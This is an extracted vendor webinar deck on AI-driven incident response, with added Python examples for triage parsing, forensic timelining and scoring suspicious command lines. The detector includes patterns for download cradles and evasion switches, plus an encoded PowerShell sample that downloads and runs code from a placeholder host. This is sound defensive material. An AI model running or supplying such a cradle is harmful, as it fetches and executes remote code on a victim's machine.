THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com
Page 1
TOM PACE
VP, GLOBAL ENTERPRISE SOLUTIONS
THE ROLE OF AI IN INCIDENT RESPONSE
The webinar will start momentarily. Please stand by.
Page 2
SAFE HARBOR
The information in this presentation is confidential and proprietary to BlackBerry ® Cylance® and may not be disclosed without
the permission of BlackBerry Cylance. This presentation is not subject to your license agreement or any other service or
subscription agreement with BlackBerry Cylance. BlackBerry Cylance has no obligation to pursue any course of business
outlined in this document or any related presentation, or to develop or release any functionality mentioned therein.
This document, or any related presentation and BlackBerry Cylance's strategy and possible future development, product,
and/or platform direction and functionality are all subject to change and may be changed by BlackBerry Cylance at any time for
any reason without notice. The information in this document is not a commitment, promise, or legal obligation to deliver any
material, code, or functionality. This document is for informational purposes and may not be incorporated into a contract.
BlackBerry Cylance assumes no responsibility for errors or omissions in this document.
Page 3
AGENDA
Current State of Incident Response (IR) Services
Impacts of AI in the BlackBerry Cylance IR Methodology
Forrester Wave Report Analysis of BlackBerry Cylance IR Services
Q&A
Page 4
WHO IS TOM?
▪ 14 Years of Security Experience
▪ Multiple Verticals (Government, Law Enforcement, Financial)
▪ 4 Years in the Marine Corps
▪ Infantry / Intelligence Work
▪ Afghanistan ’06 / Iraq ’07
▪ Education:
▪ MS, University of Pittsburgh
▪ Certifications:
▪ SANS: GCFA, GCIH, GCIA, GCWN, GCISP
▪ CISSP, SFCP
▪ Adjunct Professor at Tulane University
▪ RSA & Black Hat Speaker/Trainer
Page 5
CURRENT STATE OF IR SERVICES
Page 6
CURRENT STATE OF INCIDENT RESPONSE SERVICES
THE AVERAGE HACK TAKES 197 DAYS TO BE DETECTED [1]
▪ How many repeated ransomware incidents have you had?
▪ How many variants of the same malware have you had to deal with over the years?
▪ How many incidents have you done forensics on and found out that data was exfiltrated months before you detected it?
[1] Source: Ponemon Institute | 2018 Cost of a Data Breach Study
Page 7
CYLANCE: STRONG PERFORMER IN IR
Page 8
THE FORRESTER WAVE: CYBERSECURITY INCIDENT RESPONSE SERVICES, Q1 2019
▪ Cylance has well-defined processes and tooling to ensure effective incident response. Cylance is a global company who will only have greater reach with their recent acquisition by BlackBerry.
▪ They have a wide range of products and services, and established partnerships with law firms as well as insurance brokers as well as carriers.
▪ Cylance has demonstrated incident response expertise including investigating industrial control system (ICS) environments.
The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave are trademarks of Forrester Research, Inc. The Forrester Wave is a graphical representation of Forrester's call on a market and is plotted using a detailed spreadsheet with exposed scores, weightings, and comments. Forrester does not endorse any vendor, product, or service depicted in the Forrester Wave. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change.
Page 9
BLACKBERRY CYLANCE DIFFERENTIATORS
ICS expertise. Some of the leaders are outsourcing this capability to other vendors like Dragos. We have our own internal ICS team, which allows us to provide a much more streamlined approach.
Containment, remediation and prevention based approach. Almost all of the vendors in this Wave have inferior containment technology; our ability to rapidly quarantine known and unknown malware, as well as leverage detection rules and REFRACT packages and playbooks, provides a massive differentiator.
Product expertise. Being intimately familiar with the tools you are using from an IR perspective is critical, and thus a differentiator.
Page 10
ICS EXPERTISE
Page 11
EMPLOYEE EXPERTISE: INDUSTRIAL CONTROL SYSTEMS
Artificial intelligence/machine learning approach: revolutionary for this industry
Three-pronged approach:
▪ Discover the business impact of a cyber threat on the ICS
▪ Identify vulnerabilities and indicators of compromise within the control system environment
▪ Identify and prioritize mitigation strategies
Page 12
ICS SERVICES
ICS Security Fundamentals
ICS Red Team Services
ICS Compromise Assessment
ICS Incident Containment (Response)
ICS Component Testing & Analysis
ICS Security Assessment
Building Automation Assessment
ICS Policy Gap Analysis
ICS Security Monitoring
ICS Backup and Recovery
ICS Incident Response Program Review
Page 13
EMPLOYEE EXPERTISE: INDUSTRIAL CONTROL SYSTEMS
▪ Keynote speaker at SANS Oil and Gas Summit
▪ ICS Security Program and Standards (including NIST CSF, C2M2, IEC 62443, etc.)
▪ ICS Network and Security Architecture Design and Implementation
▪ ICS Standards Development and Deployment
▪ Process Development and Integration
▪ Designing and Implementing IT and Security Technology into ICS
▪ Multiple ICS Vendor Technologies and Platforms (Embedded Hardware and Application Software)
▪ Multiple ICS Specific Protocols
▪ Operations experience across many ICS industries
▪ Primary course creator for SANS ICS515, Incident Response in ICS environments
Page 14
EMPLOYEE EXPERTISE: INDUSTRIAL CONTROL SYSTEMS
What specific tooling is required to operate in an ICS environment?
▪ All the benefits of the Compromise Assessment (CA) process and Phase 1 (P1) scripts
▪ Lightweight agent (CylancePROTECT®)
▪ We analyze network traffic (IT and ICS protocols) using commercial, open source and custom tools
▪ Specific hardware around specific PLC devices, and other ICS hardware
▪ Leverage client or vendor supplied tools as appropriate
Page 15
INCIDENT RESPONSE METHODOLOGY
Page 16
INCIDENT RESPONSE PATHWAY TO PREVENTION
The solution to an organization's security problem includes:
MONITOR: proactive services to identify potential infection vectors; alerts on new vulnerabilities
IDENTIFY: Compromise Assessment; assess compromise activity
PREVENT: containment and remediation; predict and prevent future attacks
REMEDIATE: Incident Containment; remediate compromises
Page 17
INCIDENT CONTAINMENT PROCESS
Deploy Tools: CylancePROTECT, Collection Scripts, CylanceOPTICS™
Collect Data: file metadata
Analyze Data: known IOCs, AI/ML
Report: findings, recommendation
Page 18
AI & THE EVOLUTION TO PREVENTION
LEGACY
▪ One of the tools detects "something"
▪ Reactive
▪ Image the entire disk and/or memory
▪ Time consuming
▪ Large amount of data
▪ Requires hardware/appliances in environment for additional visibility
▪ Increase in capital costs
▪ "Seize all, find all"
PREVENTION-BASED INCIDENT CONTAINMENT
Oxymoron?
Page 19
AI & THE EVOLUTION TO PREVENTION
PREVENTION-BASED INCIDENT CONTAINMENT
▪ No network taps or monitoring of egress points
▪ Assesses every endpoint
▪ Leverage your software deployment to push out dissolvable scripts and/or through the agent
▪ Principle of least data
▪ Speed in analysis: we're TWICE as fast!
▪ Use AI for detection of malware, PUPs and compromised credentials
▪ Containment with a single mouse click
Page 20
IR PROCESS / FLOW
1. Hunt: determine the scope of the incident with confidence (P1)
▪ Cylance Compromise Assessment
▪ Acquire critical artifacts
▪ Leverage AI to find compromise(s)
2. Investigate the trail with INSPECT (P2)
▪ Further utilize AI to work smarter
▪ Collect additional artifacts
▪ Enrich the data
▪ Pivot across all data points
Flow diagram: Compromise Assessment → Scope Identified → Suspect Systems → CylanceINSPECT and CylanceV → CylanceINVESTIGATE (Actionable Results, Manual Analysis) → Remediation/Prevention
Page 21
AREAS OF ANALYSIS
• Has data been stolen or destroyed?
• Were systems, services, or applications sabotaged?
• Were administrative or security controls subverted?
• How are threat actors exerting external command of the environment?
• Did adversarial lateral movement between systems or networks occur?
• How prevalent are user accounts throughout the environment?
• Were any users' accounts compromised?
• Were user accounts leveraged in lateral movement?
• What indicators of compromise or persistence are present within the environment? How were they delivered?
• Are there occurrences of known indicators of compromise?
• What was the intended usage of malware and persistence mechanisms?
• What applications, configurations, or operating systems contain potential security risks?
Page 22
CYTRIAGE – PHASE 1 HUNTING SCRIPTS
Leveraged in IR and CA (Compromise Assessment) engagements
▪ Leverages artificial intelligence
▪ Determines anomalies, correlations and root causes
▪ Provides the fastest results in the industry
▪ Lightweight, quiet scripts that do not tip off the attacker
▪ Once the environment is remediated, we'll move it to a state of PREVENTION
▪ Assists in determining the depth and breadth of the incident
Page 23
CYTRIAGE – PHASE 1 HUNTING SCRIPTS
We can assess every endpoint
▪ Servers
▪ Workstations
Page 24
CYTRIAGE – PHASE 1 HUNTING SCRIPTS
Use system commands to gather data (2–5 minutes):
whoami
date /T
dir /R /a /s /tc
ipconfig /displaydns
netstat /ano
tasklist
tlist
schtasks /query /v /fo csv
route print
nltest
reg
xcopy
Metadata is sent to Cylance for Compromise AI analysis.
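What the "metadata, not disks" idea from the slides looks like in practice, as an added example that is not Cylance's CyTriage code: the script below parses the output of three of the commands listed above (`netstat /ano`, `tasklist` and `schtasks /query /v /fo csv`) into compact records and correlates them, flagging a process that holds external connections and whose image is also launched by a scheduled task from a user-writable directory. The command output embedded in the script is constructed to mimic the real formats so it runs offline; the list of internal networks, the user-writable path markers and the host name are assumptions made for the demo.

```python
"""Phase 1 style triage on Windows command output (added example, not CyTriage).

Only metadata leaves the host: PIDs, image names, remote endpoints, task actions.
The three command outputs below are constructed to mimic `netstat /ano`, `tasklist`
and `schtasks /query /v /fo csv`; on a live host you would capture them with
subprocess.run([...], capture_output=True, text=True).stdout instead.
"""
import csv
import io
import ipaddress
import re

NETSTAT_OUT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.0.0.15:49712        10.0.0.5:445           ESTABLISHED     4
  TCP    10.0.0.15:49801        203.0.113.77:443       ESTABLISHED     5120
  TCP    10.0.0.15:49803        198.51.100.9:8443      ESTABLISHED     5120
  UDP    0.0.0.0:5355           *:*                                    1388
"""
TASKLIST_OUT = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        152 K
svchost.exe                    912 Services                   0     11,204 K
svchost.exe                   1388 Services                   0      9,876 K
msupdate.exe                  5120 Console                    1     23,440 K
"""
SCHTASKS_OUT = (
    '"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time",'
    '"Last Result","Author","Task To Run","Start In","Comment"\n'
    '"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","Interactive/Background",'
    '"N/A","0","Microsoft Corporation","%windir%\\system32\\defrag.exe -c -h -o -$","N/A","N/A"\n'
    '"WS01","\\Updater","1/1/2019 9:00:00 AM","Ready","Interactive only","N/A","0","WS01\\jdoe",'
    '"C:\\Users\\jdoe\\AppData\\Roaming\\msupdate.exe /silent","N/A","N/A"\n'
)

# Not "external" for triage purposes (assumption: RFC1918, loopback, link-local, unspecified).
# Documentation ranges such as 203.0.113.0/24 stay external here, which is why this list is
# used instead of ipaddress.is_private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]
# A task action launched from one of these directories is worth a closer look (assumption).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
TASKLIST_ROW = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")

def is_external(ip_text):
    """True for a routable remote address; '*' or hostnames are not addresses at all."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)

def parse_netstat(text):
    """Rows of `netstat /ano`; TCP rows carry a State column, UDP rows do not."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        remote_ip, _, remote_port = parts[2].rpartition(":")
        rows.append({"proto": parts[0], "local": parts[1], "remote_ip": remote_ip,
                     "remote_port": remote_port,
                     "state": parts[3] if parts[0] == "TCP" else "", "pid": int(parts[-1])})
    return rows

def parse_tasklist(text):
    """PID -> image name from `tasklist` output (header and separator rows carry no PID)."""
    return {int(m.group("pid")): m.group("image")
            for m in map(TASKLIST_ROW.match, text.splitlines()) if m}

def parse_schtasks(text):
    """Rows of `schtasks /query /v /fo csv`; the real tool repeats the header row per folder."""
    return [row for row in csv.DictReader(io.StringIO(text)) if row["TaskName"] != "TaskName"]

def suspicious_tasks(tasks):
    """Tasks whose action runs from a user-writable directory, with the image name pulled out."""
    hits = []
    for task in tasks:
        action = task.get("Task To Run", "")
        if any(marker in action.lower() for marker in USER_WRITABLE):
            exe = action.split()[0].strip('"').rsplit("\\", 1)[-1]
            hits.append({"task": task["TaskName"], "author": task.get("Author", ""),
                         "action": action, "image": exe})
    return hits

def triage(netstat_text, tasklist_text, schtasks_text):
    """Join the three views on PID/image name and return metadata records only."""
    images = parse_tasklist(tasklist_text)
    external = [dict(conn, image=images.get(conn["pid"], "?"))
                for conn in parse_netstat(netstat_text) if is_external(conn["remote_ip"])]
    tasks = suspicious_tasks(parse_schtasks(schtasks_text))
    task_images = {t["image"].lower() for t in tasks}
    correlated = [c for c in external if c["image"].lower() in task_images]
    return {"external_connections": external, "suspicious_tasks": tasks, "correlated": correlated}
```

Calling `triage(NETSTAT_OUT, TASKLIST_OUT, SCHTASKS_OUT)` on the constructed output returns two external connections, both owned by PID 5120 (`msupdate.exe`), one scheduled task (`\Updater`) that launches the same image from the user's AppData folder, and the two connections in `correlated`; everything in the result is a small dictionary that can be shipped off-host as JSON, which is the point of a lightweight Phase 1 pass.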
Page 25
INSPECT – PHASE 2 EXECUTABLE
Deep dive into suspect systems (~30 minutes). Artifacts collected:
$MFT
Evtx
Memory
Prefetch
Processes
CylanceV
Network
Schtasks and Job files
Internet History
$LogFile
Hashes
Registry
Physical artifacts for additional analysis
Page 26
IR PROCESS / FLOW (repeat of page 20)
Page 27
IR PROCESS / FLOW
▪ The Remediation/Prevention phase is solved by CylancePROTECT
▪ CONTAINMENT of the threats
▪ Detection and response
▪ Identification of malicious/anomalous behavior
▪ Automated playbook and response capabilities
Page 28
INCIDENT CONTAINMENT OF UNKNOWN THREATS
[Bar chart, axis 0–25; the axis unit was not captured in the extraction. Values are listed in extraction order.]
Goldeneye: 14
Sauron/Strider/Remsec: 18
Zcryptor: 6
GlassRat: 18
Shamoon 2: 17
WannaCry: 20
QakBot 17: 18
NotPetya/Petya: 21
CylancePROTECT has been able to detect and block new threats before they were first seen "in the wild", without any updates or special configuration.
Page 29
INCIDENT RESPONSE DEPLOYMENT OPTIONS
Environment, incident type, severity and time dictate which use case should be applied
to each particular situation.
Options (Subset):
▪ Scripts
▪ Scripts + CylancePROTECT
▪ Scripts + CylancePROTECT + CylanceOPTICS
Use cases
▪ Malware containment
▪ Root cause analysis
▪ Patient 0 identification
Page 30
POST INCIDENT REPORTING AND SUPPORT
Using BlackBerry Cylance products, which happens in almost all IR engagements, is what delivers these fast MTTD, MTTR and MTTC (mean time to detect, respond and contain).
The combined approach that BlackBerry Cylance takes is also a differentiator. BlackBerry Cylance employs teams of ICS consultants, pentesters and IoT/embedded experts, all of whose expertise is brought to bear as needed during an IR engagement.
Page 31
POST INCIDENT REPORTING AND SUPPORT
▪ Integrated Practice Areas
▪ Dedicated Engagement Manager
▪ Holistic Approach
▪ Customized Solutions
▪ World-Renowned Security Authorities
▪ Global Coverage with Local Attention
Practice areas: ThreatZERO™, ICS, Education, IoT/Embedded, Red Team Services, Incident Containment & Forensics
Page 32
PRODUCT EXPERTISE LEVERAGING THE CYLANCE AI PLATFORM™
Page 33
SUPPORTING PRODUCTS AND SERVICES
CylancePROTECT: enterprise prevention
CylanceOPTICS: consistent visibility and preventative EDR
CylanceV™: malware detection
CyTriage: Phase 1 scripts
Cylance INSPECT: Phase 2 standalone executable
Cylance COLLECT: on-demand full disk imaging capabilities
CyNTH: Cylance Novel Threat Hunting
ELK Analysis Platform:
▪ Custom data science models integrated into the platform
▪ Phase 1 and 2 data ingested into the platform for scalable analysis and timelining
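The Phase 2 artifact list (page 25) and the "timelining" the ELK platform is used for come together in the normalization step: every artifact has its own field names and time format, and the analyst wants one ordered view to pivot through. The following is an added example (not Cylance's platform code) of that layer: it folds constructed Prefetch, Security.evtx and $MFT records for one host into a common schema, sorts them, and supports the two pivots an analyst actually does, "what happened within a few minutes of this event" and "every artifact that mentions this executable, user or path". The records, the host name and the assumption that the log timestamps are already UTC are all constructed for the demo.

```python
"""Normalize Phase 2 artifacts into one timeline and pivot across them (added example).

The records below are constructed to look like parsed Prefetch, Security.evtx and
$MFT output for one host; field names and time formats differ per source, which is
the normalization problem a timelining layer (an ELK index, for instance) has to solve.
"""
from datetime import datetime, timedelta, timezone

HOST = "WS01"  # assumed host name for the constructed records
PREFETCH = [  # executable, last run (ISO-8601 UTC), run count
    {"exe": "MSUPDATE.EXE", "last_run": "2019-03-04T09:00:12Z", "run_count": 7},
    {"exe": "CALC.EXE", "last_run": "2019-03-04T13:22:40Z", "run_count": 2},
]
EVTX = [  # Security log extracts; timestamps assumed to be UTC already
    {"event_id": 4624, "time": "2019-03-04 08:58:01", "user": "jdoe", "logon_type": 10, "src_ip": "10.0.0.7"},
    {"event_id": 4698, "time": "2019-03-04 08:59:30", "user": "jdoe", "task": "\\Updater"},
    {"event_id": 4624, "time": "2019-03-04 12:00:00", "user": "svc_backup", "logon_type": 5, "src_ip": "-"},
]
MFT = [  # path, created (Unix epoch seconds), size
    {"path": "C:\\Users\\jdoe\\AppData\\Roaming\\msupdate.exe", "created": 1551689889, "size": 48128},
]

def _event(ts, source, summary, keys):
    """Common schema: one UTC timestamp, the artifact it came from, text, and pivot keys."""
    return {"ts": ts, "host": HOST, "source": source, "summary": summary,
            "keys": {k.lower() for k in keys if k and k != "-"}}

def build_timeline(prefetch, evtx, mft):
    """Parse each source's own time format, tag pivot keys, and sort into one timeline."""
    events = []
    for p in prefetch:
        ts = datetime.strptime(p["last_run"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(_event(ts, "prefetch", f"{p['exe']} executed (run #{p['run_count']})", [p["exe"]]))
    for e in evtx:
        ts = datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        if e["event_id"] == 4624:
            summary = f"4624 logon {e['user']} type {e['logon_type']} from {e['src_ip']}"
        elif e["event_id"] == 4698:
            summary = f"4698 scheduled task created {e['task']} by {e['user']}"
        else:
            summary = f"{e['event_id']} event"
        events.append(_event(ts, "evtx", summary, [e["user"], e.get("task"), e.get("src_ip")]))
    for m in mft:
        ts = datetime.fromtimestamp(m["created"], tz=timezone.utc)
        name = m["path"].rsplit("\\", 1)[-1]
        events.append(_event(ts, "mft", f"file created {m['path']} ({m['size']} bytes)", [name, m["path"]]))
    return sorted(events, key=lambda ev: ev["ts"])

def window_around(timeline, anchor_ts, minutes=5):
    """Everything that happened within +/- minutes of an anchor event, in time order."""
    delta = timedelta(minutes=minutes)
    return [ev for ev in timeline if abs(ev["ts"] - anchor_ts) <= delta]

def related(timeline, token):
    """Pivot: every event, from any artifact, that carries this key (exe, user, path, IP)."""
    token = token.lower()
    return [ev for ev in timeline if token in ev["keys"]]

def first_seen(timeline, token):
    """Earliest artifact mentioning the token, e.g. the $MFT creation before the first run."""
    hits = related(timeline, token)
    return hits[0] if hits else None

def render(events):
    """One line per event, the shape an analyst reads or an index stores."""
    return [f"{ev['ts']:%Y-%m-%d %H:%M:%S}Z {ev['host']} {ev['source']:8} {ev['summary']}" for ev in events]
```

On the constructed data, `window_around` on the task-creation event (4698) returns the RDP-style logon, the file creation, the task registration and the first execution, in that order, and `related(timeline, "msupdate.exe")` ties the $MFT entry to the Prefetch entry even though one source wrote the name in upper case inside a full path and the other did not. That key normalization is the whole trick; without it each artifact stays its own silo.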
Page 34
CylancePROTECT
Antivirus replacement
Utilizes Machine Learning
Most admin features and reporting
Protects against executable, memory, script, and USB attacks
Page 35
WHY CYLANCEPROTECT
EFFECTIVENESS
▪ 96.8% success rate vs. malware (NSS Labs)
▪ 0.001% False Positive Rate
▪ Malware
▪ Fileless Malware
▪ Advanced Persistent Threats
▪ Zero-Days
SIMPLICITY
▪ Replaces Traditional AV
▪ Increases ROI Up To 250%* vs. Traditional AV
▪ Remove Additional Layers
▪ Reduce Help Desk Calls by 98%*
▪ Stop Emergency Patching
PERFORMANCE
▪ Lightweight Agent
▪ User Systems Run Faster
▪ Extends Hardware Lifespan
▪ Network Bandwidth Reduction
*Source: Forrester Consulting Total Economic Impact Report
Page 36
CylanceOPTICS
Threat visibility
Hunt and kill workflow
Detection and response
Integrated with CylancePROTECT
Retrieve Forensic Artifact Capabilities
Page 37
CYLANCEOPTICS MACHINE LEARNING
▪ One-liner ML Module
▪ Scripting engines are the workhorses of IT operations, but they expose a significant amount of functionality that can be leveraged by malicious actors. This module evaluates the content of command line scripts with an emphasis on the language of the script and the command line context of the script.
▪ Malicious Application Behavior ML Module
▪ An overwhelming number of attacks target a small, predictable number of trusted applications commonly found in enterprise environments. This model learns legitimate actions between common software and the operating system and blocks anything that veers too far off course.
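A model that scores command-line "one-liners" has to see the script through the command line first: decoded `-EncodedCommand` payloads, download cradles, evasion switches, entropy. The block below is an added example of that feature layer, not the CylanceOPTICS module itself; the weights that combine the features are hand-set assumptions standing in for what a trained model would learn, the threshold is likewise assumed, and the three sample command lines (two routine ones and one base64-wrapped download cradle) are constructed in the script.

```python
"""Feature extraction for command-line one-liners (added example, not the CylanceOPTICS module).

Decodes PowerShell -EncodedCommand payloads, looks for download cradles and evasion
switches, measures entropy, and combines the features with hand-set weights (an
assumption in place of weights a trained model would learn from labelled command lines).
"""
import base64
import math
import re

CRADLE_RE = re.compile(r"\b(?:downloadstring|downloadfile|invoke-expression|iex|"
                       r"net\.webclient|frombase64string|invoke-webrequest)\b")
EVASION_FLAGS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                 "-ep bypass", "-executionpolicy bypass", "-noni", "-noninteractive")
# powershell.exe accepts -e, -ec, -enc, -encoded and -encodedcommand for the same switch
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
WEIGHTS = {"encoded": 2.0, "cradle": 3.0, "evasion": 1.0, "entropy": 1.5, "long_b64": 1.0}
THRESHOLD = 3.0  # assumed cut-off for the demo

def shannon_entropy(text):
    """Bits per character; base64 blobs and random names push this up."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in (text.count(ch) for ch in set(text))) if n else 0.0

def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of a UTF-16LE script; None when absent or not valid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def extract_features(cmdline):
    """Features are computed over the visible command line plus the decoded payload."""
    low = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    scan = low + ("\n" + decoded.lower() if decoded else "")
    return {
        "length": len(cmdline),
        "encoded": decoded is not None,
        "decoded": decoded,
        "cradle": CRADLE_RE.search(scan) is not None,
        "evasion": sum(flag in low for flag in EVASION_FLAGS),
        "entropy": round(shannon_entropy(cmdline), 2),
        "long_b64": re.search(r"[A-Za-z0-9+/]{40,}={0,2}", cmdline) is not None,
    }

def score(features):
    """Weighted sum; evasion switches are capped so they cannot dominate on their own."""
    s = WEIGHTS["encoded"] * features["encoded"] + WEIGHTS["cradle"] * features["cradle"]
    s += WEIGHTS["evasion"] * min(features["evasion"], 3)
    s += WEIGHTS["entropy"] * (features["entropy"] > 4.5) + WEIGHTS["long_b64"] * features["long_b64"]
    return s

def is_suspicious(cmdline):
    return score(extract_features(cmdline)) >= THRESHOLD

# Constructed samples: two routine admin command lines and one download cradle hidden
# behind -enc, encoded here so the base64 is genuine UTF-16LE PowerShell.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
BENIGN = [
    r"powershell.exe -File C:\scripts\backup.ps1",
    r"cmd.exe /c dir C:\Temp",
]
MALICIOUS = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_CRADLE.encode("utf-16le")).decode()
```

The decode step is the one that matters: on the visible command line the malicious sample shows only two evasion switches and a long base64 run, and it is the decoded UTF-16LE text that exposes the `IEX`/`DownloadString` cradle. A real module would learn the weights and add many more features (parent process, script language, argument ordering), which is what the slide means by the language and context of the script.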
Page 38
CYLANCEV BENEFITS
▪ On-demand scanning
▪ Automated scanning
▪ Scan drives or directories for new/changed files
▪ Option to move/delete threats when detected
▪ Threat notifications can be sent to syslog
▪ Ensure you have the latest version of CylanceV (2.7.0.3 is the current version)
Page 39
CylanceV
Bad/Good executable scanner
Utilizes Machine Learning
Used for threat hunting on machines without Protect
Has extra models such as OLE and PDF
Page 40
SUPPORTING PRODUCTS AND SERVICES
ELK Analysis Platform
Page 41
STRATEGIC PRODUCT ROADMAP FOR IR
BlackBerry
▪ Mobile security and response offerings
▪ Penetration of net new client base, specifically government, IoT and automotive
▪ Integration of BlackBerry technology into IR tool stack
▪ Integration of CylancePERSONA™ technology into the IR process
▪ Additional EDR machine learning models built from input from IR engagements and fed into the CylanceOPTICS PM team
▪ Fully integrated threat research capabilities
Page 42
INNOVATION: THREAT RESEARCH INTEGRATION
▪ Sharing of CIMS (BlackBerry Cylance Incident Management Sheet) reports between IR and TR teams
▪ Assists in deriving intelligence based on threats identified in client environments
▪ Leverages telemetry from all client environments to determine risk and prevalence of particular threats
▪ Assists in malware analysis, reverse engineering and research; uses AI for classification
▪ Ability to quickly derive IOCs and share back with the IR team
Is this malware unique? How many machines is it on?
Page 43
INNOVATION: DATA SCIENCE INTEGRATION
The data science team requires well-labeled malicious data, IOCs, etc., as well as benign data from various types of environments, verticals and company sizes. This data can be derived from:
▪ IR engagements
▪ CAs
▪ Pentests
▪ Vulnerability assessments
Data flows from the IR team to the data science team; models and other analytical techniques flow back to the IR team.
Page 44
INNOVATION: DATA SCIENCE INTEGRATION
Models
▪ User Clustering leveraging the K-Means algorithm
▪ DGA Detection using Neural Networks
▪ Process Anomaly Detection using Random Forests
▪ Malware Nearest Neighbor Identification leveraging HDBSCAN
Page 45
PRESS RELEASE
"We're so pleased to see Forrester reinforce, in our opinion, the effectiveness of our proven AI incident response methodology based on containment, remediation, and prevention. Our expert consultants work quickly to not only resolve incidents and restore operations, but also to leverage BlackBerry Cylance's first-of-its-kind artificial intelligence to get ahead of the kill chain and prevent incidents before they happen."
Corey White, Chief Customer Officer, BlackBerry Cylance
"We believe Cylance Consulting is one of the few vendors listed in the Forrester Wave that licenses and shares its machine learning based tools and methodologies. Our continued commitment to sharing these tools and techniques, as well as collaborating with our strategic consulting partners is helping to create a stronger and more effective incident response community around the world."
Sasi Murthy, VP of Product Marketing, BlackBerry Cylance
Page 46
QUESTIONS AND ANSWERS
Page 47
Contact Us
+1-877-973-3336
Learn more about Cylance Consulting
Page 48
Additional Resources
Incident Containment and Forensics:
Incident Containment
Incident Containment Retainer
Compromise Assessment
Page 49
THANK YOU
Page 50